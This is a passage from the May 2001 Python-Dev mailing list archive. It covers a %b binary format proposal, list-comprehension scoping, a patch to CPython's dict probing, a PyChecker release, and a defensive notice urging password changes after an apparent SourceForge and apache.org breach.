inclusive, but > int->string is spelled via 3 different builtins covering only 3 of those > bases. That sounds like a strong argument to me. -- Eric S. Raymond The world is filled with violence. Because criminals carry guns, we decent law-abiding citizens should also have guns. Otherwise they will win and the decent people will lose. -- James Earl Jones From nas@python.ca Wed May 30 23:38:58 2001 From: nas@python.ca (Neil Schemenauer) Date: Wed, 30 May 2001 15:38:58 -0700 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530153858.A21901@glacier.fnational.com> Tim Peters wrote: > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. Ever used MacLisp or ZetaLisp? There: 777 == 0d511 If only we had been born with 8 or 16 fingers, right? Neil From thomas@xs4all.net Thu May 31 02:52:48 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 03:52:48 +0200 Subject: [Python-Dev] SF hacked Message-ID: <20010531035248.G690@xs4all.nl> It *seems*, from this site: http://66.92.75.28/~vladimir/themes-org.html that SourceForge has been hacked, and more seriously than SF first admits (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) And the same goes for apache.org, it looks like. Anyway, if anyone connected *from* any of sourceforge's machines to anywhere else, in the last couple of months, they'll be well advised to change their passwords and check for intruders. The same goes if you connect through ssh and (foolishly ;) allowed ssh-agent-forwarding to the SF machines. In that case, better check all the machines that ssh-agent would give you unpassworded access to for logins you don't recognize. The site above lists a number of sniffed passwords, in case you want to check, but there's no reason for the hacker not to have even more sniffed passwords lying about :) And if you have a login on apache.org, you probably want to change your password in any case.... the above listed site has what seems to be a copy of the shadow password file. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one@home.com Thu May 31 04:53:53 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 23:53:53 -0400 Subject: [Python-Dev] One more dict trick Message-ID: This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C0E963.C83DC7A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit If anyone has an app known or suspected to be sensitive to dict timing, please try the patch here. Best I've been able to tell, it's a win. But it's a radical change in approach, so I don't want to rush it. This gets rid of the polynomial machinery entirely, along with the branches associated with updating the things, and the dictobject struct member holding the table's poly. Instead it relies on that i = (5*i + 1) % n is a full-period RNG whenever n is a power of 2 (that's what guarantees it will visit every slot), but perturbs that by adding in a few bits from the full hash code shifted right each time (that's what guarantees every bit of the hash code eventually influences the probe sequence, avoiding simple quadratic-time degenerate cases). ------=_NextPart_000_0006_01C0E963.C83DC7A0 Content-Type: text/plain; name="dict.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="dict.txt" Index: Objects/dictobject.c =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.96 diff -c -r2.96 dictobject.c *** Objects/dictobject.c 2001/05/27 07:39:22 2.96 --- Objects/dictobject.c 2001/05/31 03:29:23 *************** *** 85,123 **** iteration. */ =20 - static long polys[] =3D { - /* 4 + 3, */ /* first active entry if MINSIZE =3D=3D 4 */ - 8 + 3, /* first active entry if MINSIZE =3D=3D 8 */ - 16 + 3, - 32 + 5, - 64 + 3, - 128 + 3, - 256 + 29, - 512 + 17, - 1024 + 9, - 2048 + 5, - 4096 + 83, - 8192 + 27, - 16384 + 43, - 32768 + 3, - 65536 + 45, - 131072 + 9, - 262144 + 39, - 524288 + 39, - 1048576 + 9, - 2097152 + 5, - 4194304 + 3, - 8388608 + 33, - 16777216 + 27, - 33554432 + 9, - 67108864 + 71, - 134217728 + 39, - 268435456 + 9, - 536870912 + 5, - 1073741824 + 83 - /* 2147483648 + 9 -- if we ever boost this to unsigned long */ - }; -=20 /* Object used as dummy key to fill deleted entries */ static PyObject *dummy; /* Initialized by first call to = newdictobject() */ =20 --- 85,90 ---- *************** *** 168,174 **** int ma_fill; /* # Active + # Dummy */ int ma_used; /* # Active */ int ma_size; /* total # slots in ma_table */ - int ma_poly; /* appopriate entry from polys vector */ /* ma_table points to ma_smalltable for small tables, else to * additional malloc'ed memory. ma_table is never NULL! This rule * saves repeated runtime null-tests in the workhorse getitem and --- 135,140 ---- *************** *** 202,209 **** (mp)->ma_table =3D (mp)->ma_smalltable; \ (mp)->ma_size =3D MINSIZE; \ (mp)->ma_used =3D (mp)->ma_fill =3D 0; \ - (mp)->ma_poly =3D polys[0]; \ - assert(MINSIZE < (mp)->ma_poly && (mp)->ma_poly < MINSIZE*2); \ } while(0) =20 PyObject * --- 168,173 ---- *************** *** 252,257 **** --- 216,240 ---- a dictentry* for which the me_value field is NULL. Exceptions are = never reported by this function, and outstanding exceptions are maintained. */ +=20 + /* #define DUMP_HASH_STUFF */ + #ifdef DUMP_HASH_STUFF + static int nEntry =3D 0, nCollide =3D 0, nTrip =3D 0; + #define BUMP_ENTRY ++nEntry + #define BUMP_COLLIDE ++nCollide + #define BUMP_TRIP ++nTrip + #define PRINT_HASH_STUFF \ + if ((nEntry & 0x1ff) =3D=3D 0) \ + fprintf(stderr, "%d %d %d\n", nEntry, nCollide, nTrip) +=20 + #else + #define BUMP_ENTRY + #define BUMP_COLLIDE + #define BUMP_TRIP + #define PRINT_HASH_STUFF + #endif +=20 +=20 static dictentry * lookdict(dictobject *mp, PyObject *key, register long hash) { *************** *** 265,270 **** --- 248,254 ---- register int checked_error =3D 0; register int cmp; PyObject *err_type, *err_value, *err_tb; + BUMP_ENTRY; /* We must come up with (i, incr) such that 0 <=3D i < ma_size and 0 < incr < ma_size and both are a function of hash. i is the initial table index and incr the initial probe offset. */ *************** *** 294,309 **** } freeslot =3D NULL; } ! /* Derive incr from hash, just to make it more arbitrary. Note that ! incr must not be 0, or we will get into an infinite loop.*/ ! incr =3D hash ^ ((unsigned long)hash >> 3); !=20 /* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! if (!incr) ! incr =3D 1; /* and incr will never be 0 again */ ! ep =3D &ep0[(i + incr) & mask]; if (ep->me_key =3D=3D NULL) { if (restore_error) PyErr_Restore(err_type, err_value, err_tb); --- 278,292 ---- } freeslot =3D NULL; } ! incr =3D hash; ! BUMP_COLLIDE; /* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! BUMP_TRIP; ! i =3D (i << 2) + i + (incr & 0xf) + 1; ! incr >>=3D 4; ! ep =3D &ep0[i & mask]; if (ep->me_key =3D=3D NULL) { if (restore_error) PyErr_Restore(err_type, err_value, err_tb); *************** *** 335,344 **** } else if (ep->me_key =3D=3D dummy && freeslot =3D=3D NULL) freeslot =3D ep; - /* Cycle through GF(2**n). */ - if (incr & 1) - incr ^=3D mp->ma_poly; /* clears the lowest bit */ - incr >>=3D 1; } } =20 --- 318,323 ---- *************** *** 370,375 **** --- 349,356 ---- mp->ma_lookup =3D lookdict; return lookdict(mp, key, hash); } + BUMP_ENTRY; + PRINT_HASH_STUFF; /* We must come up with (i, incr) such that 0 <=3D i < ma_size and 0 < incr < ma_size and both are a function of hash */ i =3D hash & mask; *************** *** 387,400 **** } /* Derive incr from hash, just to make it more arbitrary. Note that incr must not be 0, or we will get into an infinite loop.*/ ! incr =3D hash ^ ((unsigned long)hash >> 3); !=20 /* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! if (!incr) ! incr =3D 1; /* and incr will never be 0 again */ ! ep =3D &ep0[(i + incr) & mask]; if (ep->me_key =3D=3D NULL) return freeslot =3D=3D NULL ? ep : freeslot; if (ep->me_key =3D=3D key --- 368,382 ---- } /* Derive incr from hash, just to make it more arbitrary. Note that incr must not be 0, or we will get into an infinite loop.*/ ! incr =3D hash; ! BUMP_COLLIDE; /* In the loop, me_key =3D=3D dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! BUMP_TRIP; ! i =3D (i << 2) + i + (incr & 0xf) + 1; ! incr >>=3D 4; ! ep =3D &ep0[i & mask]; if (ep->me_key =3D=3D NULL) return freeslot =3D=3D NULL ? ep : freeslot; if (ep->me_key =3D=3D key *************** *** 404,413 **** return ep; if (ep->me_key =3D=3D dummy && freeslot =3D=3D NULL) freeslot =3D ep; - /* Cycle through GF(2**n). */ - if (incr & 1) - incr ^=3D mp->ma_poly; /* clears the lowest bit */ - incr >>=3D 1; } } =20 --- 386,391 ---- *************** *** 448,454 **** static int dictresize(dictobject *mp, int minused) { ! int newsize, newpoly; dictentry *oldtable, *newtable, *ep; int i; int is_oldtable_malloced; --- 426,432 ---- static int dictresize(dictobject *mp, int minused) { ! int newsize; dictentry *oldtable, *newtable, *ep; int i; int is_oldtable_malloced; *************** *** 456,475 **** =20 assert(minused >=3D 0); =20 ! /* Find the smallest table size > minused, and its poly[] entry. */ ! newpoly =3D 0; ! newsize =3D MINSIZE; ! for (i =3D 0; i < sizeof(polys)/sizeof(polys[0]); ++i) { ! if (newsize > minused) { ! newpoly =3D polys[i]; ! break; ! } ! newsize <<=3D 1; ! if (newsize < 0) /* overflow */ ! break; ! } ! if (newpoly =3D=3D 0) { ! /* Ran out of polynomials or newsize overflowed. */ PyErr_NoMemory(); return -1; } --- 434,445 ---- =20 assert(minused >=3D 0); =20 ! /* Find the smallest table size > minused. */ ! for (newsize =3D MINSIZE; ! newsize <=3D minused && newsize >=3D 0; ! newsize <<=3D 1) ! ; ! if (newsize < 0) { PyErr_NoMemory(); return -1; } *************** *** 511,517 **** mp->ma_table =3D newtable; mp->ma_size =3D newsize; memset(newtable, 0, sizeof(dictentry) * newsize); - mp->ma_poly =3D newpoly; mp->ma_used =3D 0; i =3D mp->ma_fill; mp->ma_fill =3D 0; --- 481,486 ---- ------=_NextPart_000_0006_01C0E963.C83DC7A0-- From tim.one@home.com Thu May 31 05:46:56 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 31 May 2001 00:46:56 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530183833.B1654@thyrsus.com> Message-ID: [ESR] > The 0xxx notation was copied from PDP-11 assembler literals -- the > instruction-set design of the PDP-11 was such that most of the > instruction subfields fit in octal digits, so this convention made it > somewhat easier to read machine-code dumps. That doesn't mean they weren't certifiably insane. At Cray, we had a much more sensible convention: *all* numbers were octal (yes, it was a 64-bit box and octal didn't make any sense, but Seymour Cray got used to it from the 60-bit CDC w/ 18-bit address registers and didn't feel like changing). My first boss there loved telling the story about he was out for a drive with the family, and excitedly screamed "Hey, kids! Look! The odometer is just about to change to 40,000!". Of course it read 37,777.9 at the time, and they thought he was nuts. That's where this kind of thing always leads in the end. to-disgrace-despair-and-eventually-ruin-ly y'rs - tim From tim.one@home.com Thu May 31 05:48:28 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 31 May 2001 00:48:28 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530153858.A21901@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Ever used MacLisp or ZetaLisp? There: > > 777 == 0d511 > > If only we had been born with 8 or 16 fingers, right? Then guys would probably be attracted to base 9 or 17. sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs - tim From greg@cosc.canterbury.ac.nz Thu May 31 06:15:24 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:15:24 +1200 (NZST) Subject: [Python-Dev] scoping and list comprehensions In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com> Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz> Skip: > scope: > l = [i**2 for i in range(10)] By analogy with C, the introducer of a new scope should simply be an unadorned colon: : l = [i**2 for i in range(10)] :-) While this might be useful, it doesn't really address the issue raised, because we really need a new scope per listcomp (or maybe even each 'for' in the listcomp). > There's also the problem of how to export results from the scope, though > perhaps the new nested scope stuff provides a solution to that. Nope -- there's still no way to assign to any name in an intermediate scope. Something heretical, such as declarations, would be needed. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 31 06:16:11 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:11 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz> Tim: > >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in > digits] Yikes! That would be clearer as [[x,y,z] for x in digits for y in digits for z in digits] I'll concede it's nowhere near as much fun, though... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 31 06:16:41 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:41 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Tim: > Needs a PEP, and possibly > even an associated future-statement. Overall, I'm more in favor of changing > it than not. If we do this, we also need to consider whether we want to make the corresponding change to regular for-loops. Seems to me that all the reasons it's a good idea for listcomps apply to for-loops as well. Another advantage of changing both together is that we can continue to describe listcomp semantics in terms of for-loops instead of lambdas. Then we won't have to go into hiding until Guido dies or lifts the fatwah against us. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 31 06:17:16 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:17:16 +1200 (NZST) Subject: [Python-Dev] %b format? In-Reply-To: Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Tim: > On the fifth hand, I doubt anyone would want to add new % format codes for > bases {2..36} - {2, 8, 10, 16}. So, just add one general one: %m.nb with n being the base. If n defaults to 2, you can read the "b" as either "base" or "binary". Literals: 0b(5)21403 general 0b11001101 binary Conversion functions: base(x, n) general bin(x) equivalent to base(x, 2) (for symmetry with existing hex, oct) Type slots: __base__(x, n) Backwards compatibility measures: hex(x) --> base(x, 16) oct(x) --> base(x, 8) bin(x) --> base(x, 2) base(x, n) checks __hex__ and __oct__ slots for special cases of n=16 and n=8, falls back on __base__ There, that takes care of integers. Anyone want to do the equivalent for floats ?-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From esr@thyrsus.com Thu May 31 07:01:54 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 02:01:54 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200 References: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: <20010531020154.A4404@thyrsus.com> Greg Ewing : > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". I had a similar idea, but your version is more elegant. -- Eric S. Raymond The common argument that crime is caused by poverty is a kind of slander on the poor. -- H. L. Mencken From tim_one@email.msn.com Thu May 31 07:20:21 2001 From: tim_one@email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:20:21 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > If we do this, we also need to consider whether we want > to make the corresponding change to regular for-loops. > Seems to me that all the reasons it's a good idea for > listcomps apply to for-loops as well. I expect there's no chance: unlike listcomps, for-loops allow break statements, and search loops that use the for index after a break (and out of the loop!) are common. > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops But I'm afraid that's also an advantage of leaving both alone. > instead of lambdas. > > Then we won't have to go into hiding until Guido dies or lifts > the fatwah against us. Death won't stop him -- he's Dutch . From tim_one@email.msn.com Thu May 31 07:28:04 2001 From: tim_one@email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:28:04 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". Except .n has a different meaning already for integer conversions: >>> "%.5d" % 2 '00002' >>> "%.10o" % 377 '0000000571' >>> It would be inconsistent to hijack it to mean something else here. > Literals: > > 0b(5)21403 general I've actually got no use for bases outside {2, 8, 10, 16), and have never heard a request for them either, so I'd be at best -0. Better to stop documenting the full truth about int() <0.9 wink>. > 0b11001101 binary +1. > Conversion functions: > > base(x, n) general -0, as above. > bin(x) equivalent to base(x, 2) (for symmetry with > existing hex, oct) +1 if binary literals are added. > Type slots: > > __base__(x, n) Given the tenor of the above, add __bin__ and call it a day. > Backwards compatibility measures: > > hex(x) --> base(x, 16) > oct(x) --> base(x, 8) > bin(x) --> base(x, 2) > > base(x, n) checks __hex__ and __oct__ slots for special cases > of n=16 and n=8, falls back on __base__ > > There, that takes care of integers. Anyone want to do the > equivalent for floats ?-) Note that C99 introduces a hex notation for floats. From mal@lemburg.com Thu May 31 08:20:11 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:20:11 +0200 Subject: [Python-Dev] SF hacked References: <20010531035248.G690@xs4all.nl> Message-ID: <3B15F0AB.34F2F664@lemburg.com> Thomas Wouters wrote: > > It *seems*, from this site: > > http://66.92.75.28/~vladimir/themes-org.html > > that SourceForge has been hacked, and more seriously than SF first admits > (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) > And the same goes for apache.org, it looks like. Anyway, if anyone connected > *from* any of sourceforge's machines to anywhere else, in the last couple of > months, they'll be well advised to change their passwords and check for > intruders. The same goes if you connect through ssh and (foolishly ;) > allowed ssh-agent-forwarding to the SF machines. In that case, better check > all the machines that ssh-agent would give you unpassworded access to for > logins you don't recognize. The site above lists a number of sniffed > passwords, in case you want to check, but there's no reason for the hacker > not to have even more sniffed passwords lying about :) > > And if you have a login on apache.org, you probably want to change your > password in any case.... the above listed site has what seems to be a copy > of the shadow password file. FYI, the file's contents are no longer available it seems. Still, SF seems to be alarmed about this: ***************************************************************************** I M P O R T A N T P L E A S E R E A D ***************************************************************************** If you are seeing this it's because we've failed over from pr-shell1. This is a failover server only. As soon as pr-shell1 is better we will cut back to it. So please do not start any daemon process that you care about. - The SF Staff About the password change: this doesn't seem to be possible on the failover machine (I get a permission denied message). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Thu May 31 08:33:36 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:33:36 +0200 Subject: [Python-Dev] One more dict trick References: Message-ID: <3B15F3D0.AD646102@lemburg.com> Tim Peters wrote: > > If anyone has an app known or suspected to be sensitive to dict timing, > please try the patch here. Best I've been able to tell, it's a win. But > it's a radical change in approach, so I don't want to rush it. > > This gets rid of the polynomial machinery entirely, along with the branches > associated with updating the things, and the dictobject struct member > holding the table's poly. Instead it relies on that > > i = (5*i + 1) % n > > is a full-period RNG whenever n is a power of 2 (that's what guarantees it > will visit every slot), but perturbs that by adding in a few bits from the > full hash code shifted right each time (that's what guarantees every bit of > the hash code eventually influences the probe sequence, avoiding simple > quadratic-time degenerate cases). Cool idea... rips out all that algebra garble and replaces it with random beauty :-) In any case, this will avoid use the trouble of having to check those poly numbers every time Intel decides to bump the register width by another factor of two ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr@thyrsus.com Thu May 31 09:43:32 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 04:43:32 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200 References: <3B15F3D0.AD646102@lemburg.com> Message-ID: <20010531044332.B5026@thyrsus.com> M.-A. Lemburg : > In any case, this will avoid use the trouble of having to check > those poly numbers every time Intel decides to bump the register > width by another factor of two ;-) This seems unlikely. 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume a memory density, of, say 2^20 machine words or roughly 8 megabytes per cubic centimeter (much, *much* better than we'll be able to do for the forseeable future -- remember power distribution and heat dissipation). Then, approximating the cubic relation between a sphere's volume and area by lopping off a power of four, we see that 2^64 64-bit words of memory would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 17 million kilometers. This is roughly twice the diameter of the Sun. 64-bit computers aren't going to run out of address space any time soon. 64-bit clocks counting seconds will turn over in approximately six trillion years, long after the expansion of the Universe will have dropped its energy density low enough to make computation...well, let's just say "difficult" and leave it at that. Nobody needs 128 bits of integer or floating-point precision, either. There's basically no source of data to compute with that's got anywhere near 22 significant digits of accuracy -- 48 bits is about the most people in scientific computing ever use. -- Eric S. Raymond [President Clinton] boasts about 186,000 people denied firearms under the Brady Law rules. The Brady Law has been in force for three years. In that time, they have prosecuted seven people and put three of them in prison. You know, the President has entertained more felons than that at fundraising coffees in the White House, for Pete's sake." -- Charlton Heston, FOX News Sunday, 18 May 1997 From mal@lemburg.com Thu May 31 10:23:52 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 11:23:52 +0200 Subject: [Python-Dev] One more dict trick References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <3B160DA8.B9FF9AC2@lemburg.com> "Eric S. Raymond" wrote: > > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > > This seems unlikely. > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > cubic centimeter (much, *much* better than we'll be able to do for the > forseeable future -- remember power distribution and heat dissipation). Where did you get those numbers from ? There are memory sticks with 128 MB around and these measure about 2.5 cm^2 * 1 mm. > Then, approximating the cubic relation between a sphere's volume and area > by lopping off a power of four, we see that 2^64 64-bit words of memory > would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about > 17 million kilometers. > > This is roughly twice the diameter of the Sun. 64-bit computers > aren't going to run out of address space any time soon. > > 64-bit clocks counting seconds will turn over in approximately six > trillion years, long after the expansion of the Universe will have > dropped its energy density low enough to make computation...well, > let's just say "difficult" and leave it at that. > > Nobody needs 128 bits of integer or floating-point precision, either. > There's basically no source of data to compute with that's got > anywhere near 22 significant digits of accuracy -- 48 bits is > about the most people in scientific computing ever use. Just you wait... someday marketing people will probably invent the world memory facility and start assigning a few hundred Terabytes for everyone on this planet to use for his/her data storage -- store once, use everywhere ;-) Let's assume we have 12e9 people on this planet by that time, then we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or roughly 2^80 bytes per civilization. Of course, they will want to run Python in order to manage that data and so will all those Palm uses hooking up to the facility... ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr@thyrsus.com Thu May 31 11:31:07 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 06:31:07 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com> Message-ID: <20010531063107.B5510@thyrsus.com> M.-A. Lemburg : > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > > cubic centimeter (much, *much* better than we'll be able to do for the > > forseeable future -- remember power distribution and heat dissipation). > > Where did you get those numbers from ? There are memory sticks > with 128 MB around and these measure about 2.5 cm^2 * 1 mm. Remember power distribution and heat dissipation. You can't just figure volume of the memory ICs, you have to include power and cooling and structural support too. I eyeballed some DRAM modules I had lying around. In any case, my figures aren't that sensitive to memory density. If I'm off by a factor of 64 the diameter of the memory sphere unly drops by a factor of four (it's that cube-root relationship between volume and radius). So it's only half the radius of the Sun. That's still way, *way* more mass than all the planets in the Solar System put together. > Just you wait... someday marketing people will probably invent the > world memory facility and start assigning a few hundred > Terabytes for everyone on this planet to use for his/her data > storage -- store once, use everywhere ;-) > > Let's assume we have 12e9 people on this planet by that time, then > we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or > roughly 2^80 bytes per civilization. Nah. Individual storage requirements would never get that large. Bill Joy did a study on this once and figured out that human beings can generate about 14GB of text during their lifetimes, max. In a system like the Web-on-steroids one you're supposing, higher-volume stuff like streaming video or Linux-kernel archives would be stored *once* with URLs pointing at them from peoples' individual stores. One terabyte (2^40) per person leaves plenty of headroom (two orders of magnitude larger). We could still handle a world population of 2^24 or roughly 16 billion people. (I think the size of the Library of Congress has been estimated at several thousand terabytes.) -- Eric S. Raymond I don't like the idea that the police department seems bent on keeping a pool of unarmed victims available for the predations of the criminal class. -- David Mohler, 1989, on being denied a carry permit in NYC From thomas@xs4all.net Thu May 31 11:45:33 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 12:45:33 +0200 Subject: [Python-Dev] One more dict trick In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <20010531124533.J690@xs4all.nl> On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote: > M.-A. Lemburg : > > In any case, this will avoid use the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > This seems unlikely. Why ? Bumping register size doesn't mean Intel expects to use it all as address space. They could be used for video-processing, or to represent a modest range of rationals , or to help core 'net routers deal with those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger registers as well. Oh wait... I get it! You were trying to get yourself in the historybooks as the guy that said "64 bits ought to be enough for everyone" :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From PyChecker Wed May 30 03:49:45 2001 From: PyChecker (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker@metaslash.com From beazley@cs.uchicago.edu Thu May 31 14:34:57 2001 From: beazley@cs.uchicago.edu (David Beazley) Date: Thu, 31 May 2001 08:34:57 -0500 (CDT) Subject: [Python-Dev] RE: Iteration variables and list comprehensions In-Reply-To: References: Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu> Greg Ewing writes: > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops instead of lambdas. Is this really an advantage? To me, the lambda semantics are a lot more intuitive in terms of matching the way that list comprehensions are actually used and ought to work (although I will agree that the for-loop explanation is a good way to describe the internals of what a list comprehension actually does). I think I would be opposed to changing normal for-loop semantics to match any change made in list-comprehensions. There are too many cases where you use a loop variable after finishing a loop and I suspect that this 